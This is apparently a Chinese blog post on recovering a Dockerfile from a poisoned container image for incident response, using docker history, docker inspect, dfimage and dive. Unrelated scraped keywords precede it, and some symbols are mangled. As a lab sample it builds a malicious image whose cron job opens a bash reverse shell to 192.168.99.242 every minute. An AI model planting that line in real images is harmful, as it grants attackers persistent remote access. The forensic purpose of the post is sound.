做老电影网站侵权吗,宁波 小程序开发公司,甘肃网络公司网站建设,wordpress 随机标签云01、概述 当涉及到容器镜像的安全时#xff0c;特别是在出现镜像投毒引发的安全事件时#xff0c;追溯镜像的来源和解析Dockerfile文件是应急事件处理的关键步骤。在这篇博客中#xff0c;我们将探讨如何从镜像解析获取Dockerfile文件#xff0c;这对容器安全至关重要。 02… 01、概述 当涉及到容器镜像的安全时特别是在出现镜像投毒引发的安全事件时追溯镜像的来源和解析Dockerfile文件是应急事件处理的关键步骤。在这篇博客中我们将探讨如何从镜像解析获取Dockerfile文件这对容器安全至关重要。 02、环境准备 利用Dockfile构建一个反弹shell的恶意镜像 FROM ubuntu:20.04
RUN apt-get update \apt-get install -y cron \(echo * * * * * bash -c bash -i /dev/tcp/192.168.99.242/12345 01; crontab -l )| crontab
ENTRYPOINT [cron,-f,]
CMD [/bin/bash] 03、镜像解析Dockerfile 3.1 镜像文件解析 在镜像的元数据信息中到镜像构建所使用的 Dockerfile可以成功解析 Docker 镜像并获取其 Dockerfile 内容以了解镜像的构建过程和引入的软件包及配置。 docker save -o test.tar test:v1.0tar -xvf test.tar 3.2 docker命令参数 使用docker history 命令查看指定镜像的创建历史展示只能看到一部分可以加上 --no-trunc就可以看到全部信息。 docker history test:v1.0
docker history test:v1.0 --no-trunc 使用docker inspect命令来查看Docker镜像的详细信息通过--format参数可自行定义输出信息获取镜像的配置信息。 #查看镜像的配置信息
docker inspect --format{{json .Config}} test:v1.0 3.3 dfimage dfimage是一款第三方工具可用来从镜像中提取 Dockerfile 1生成快捷方式使用dfimage可以输出很详细的 Dockerfile。 alias dfimagedocker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage
dfimage -sV1.36 test:v1.0 3.4 Docker镜像分析神器 Dive Dive是一款Docker镜像分析神器分析和浏览 Docker 容器镜像内部可以很详细的看到每一层文件的变化。 alias divedocker run -ti --rm -v /var/run/docker.sock:/var/run/docker.sock wagoodman/dive
dive test:v1.0
